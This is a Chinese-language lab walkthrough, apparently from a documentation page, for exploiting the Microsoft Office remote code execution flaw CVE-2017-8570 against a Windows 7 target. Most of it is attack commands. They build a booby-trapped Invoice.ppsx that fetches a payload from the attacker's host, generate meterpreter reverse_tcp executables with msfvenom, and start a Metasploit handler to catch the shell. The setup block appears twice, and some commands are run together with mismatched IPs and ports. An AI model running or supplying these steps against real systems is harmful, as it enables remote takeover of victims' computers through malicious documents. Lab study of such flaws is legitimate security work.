Microsoft Office远程代码执行漏洞
CVE-2017-8570
【原理】
【工具】
【步骤】
靶机:
操作系统:windows 7 sp1 x64
Office版本*:Office 专业增强版 2016
ip:192.168.0.103
攻击者Kali:
操作系统:kali2021.4
metasploit版本:msf6
ip:192.168.0.104









最后更新于
CVE-2017-8570
靶机:
操作系统:windows 7 sp1 x64
Office版本*:Office 专业增强版 2016
ip:192.168.0.103
攻击者Kali:
操作系统:kali2021.4
metasploit版本:msf6
ip:192.168.0.104









最后更新于
cd Office8570 //进入exp文件夹
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc
//这里的192.168.0.104是攻击者的ip地址msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > shell.exe生成针对x64位系统 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=6666 -f exe > shell.exe
生成针对32位系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=6666 -f exe > shell.exesu //使用root权限
输入密码
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l shell.exe~ msfconsole
use exploit/multi/handler
set LHOST 192.168.0.104
set LPORT 4444
show options
64位系统 msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
32位系统 msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit